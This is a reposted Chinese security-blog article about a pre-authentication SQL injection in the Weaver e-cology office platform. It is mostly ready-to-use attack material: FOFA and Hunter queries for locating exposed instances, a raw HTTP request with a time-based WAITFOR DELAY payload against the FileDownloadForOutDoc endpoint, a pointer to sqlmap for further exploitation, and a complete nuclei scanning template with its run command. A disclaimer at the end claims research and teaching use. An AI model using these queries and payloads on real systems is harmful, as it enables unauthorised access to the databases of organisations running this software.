泛微 e-cology 前台SQL注入漏洞

admin 2024年10月18日22:53:30评论7 views字数 1619阅读5分23秒阅读模式

 

漏洞描述

(一) 泛微e-cology

泛微 e-cology 前台SQL注入漏洞

泛微e-cology是泛微网络科技股份有限公司开发的一套企业级办公协同平台。它提供了一系列的解决方案,包括文档管理、流程管理、协同办公、知识管理、移动办公等功能。泛微e-cology的目标是帮助企业提高工作效率,实现信息共享与协同办公,促进组织内部的沟通和协作。这个平台被广泛应用于各行各业的企事业单位,帮助他们提升管理水平和工作效率。

FOFA语法:

app.name=="泛微 e-cology 9.0 OA"

hunter语法:

app.name="泛微 e-cology 9.0 OA"app.name="泛微 e-cology OA"

泛微 e-cology 前台SQL注入漏洞

(二) 漏洞poc
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveReferer: 127.0.0.1:9999/wui/index.htmlContent-Type: application/x-www-form-urlencodedAccept-Language: zh-CN,zh;q=0.9Content-Length: 45fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1

使用sqlmap注入

泛微 e-cology 前台SQL注入漏洞

nuclei扫描脚本

来源:https://github.com/UltimateSec/ultimaste-nuclei-templates/blob/main/ecology-oa/ecology-oa-filedownloadforoutdoc-sqli.yaml

id: ecology-oa-filedownloadforoutdoc-sqliinfo:  name: EcologyOA filedownloadforoutdoc - SQL injection  author: unknown  severity: critical  description: EcologyOA filedownloadforoutdoc interface has SQL injection  tags: ecology-oa,sqlirequests:  - raw:      - |        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1        Host: {{Hostname}}        Accept: */*        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9        Connection: close                fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1    matchers:      - type: dsl        dsl:          - 'duration>=5'

 

./nuclei -u http://oa.xxx.com/ -t ./ultimaste-nuclei-templates/ecology-oa/ecology-oa-filedownloadforoutdoc-sqli.yaml

本文由月落星辰团队编写,我们会在群里发送公开直播课链接,群聊已满的添加Vx:linjialelovejesus,备注进群听课。

   欢迎各位网安工程师加入月落安全研究实验室,一起学习交流讨论!(已加入一二三四五群的无需重复加群,听课链接我们会同步)

泛微 e-cology 前台SQL注入漏洞

原文始发于微信公众号(月落安全):漏洞ing | 泛微 e-cology 前台SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月18日22:53:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微 e-cology 前台SQL注入漏洞https://cn-sec.com/archives/1881340.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息